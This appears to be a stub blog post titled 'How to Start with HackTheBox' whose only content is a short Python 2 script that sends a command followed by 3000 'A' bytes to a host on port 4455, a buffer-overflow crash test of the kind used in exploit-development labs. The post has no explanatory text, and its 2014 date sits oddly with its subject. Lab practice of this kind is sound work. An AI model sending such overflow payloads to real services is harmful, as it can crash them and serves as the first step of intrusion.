+++
title =  "How to Start with HackTheBox"
tags = ["htb"]
date = "2014-09-28"
+++

## Introduction

{{<highlight python >}}
#!/usr/bin/python
 
import sys, socket
 
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()
 
cmd = "OVRFLW "
junk = "\x41" * 3000
end = "\r\n"
 
buffer = cmd + junk + end
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 4455))
s.send(buffer)
s.recv(1024)
s.close()
{{</highlight >}}
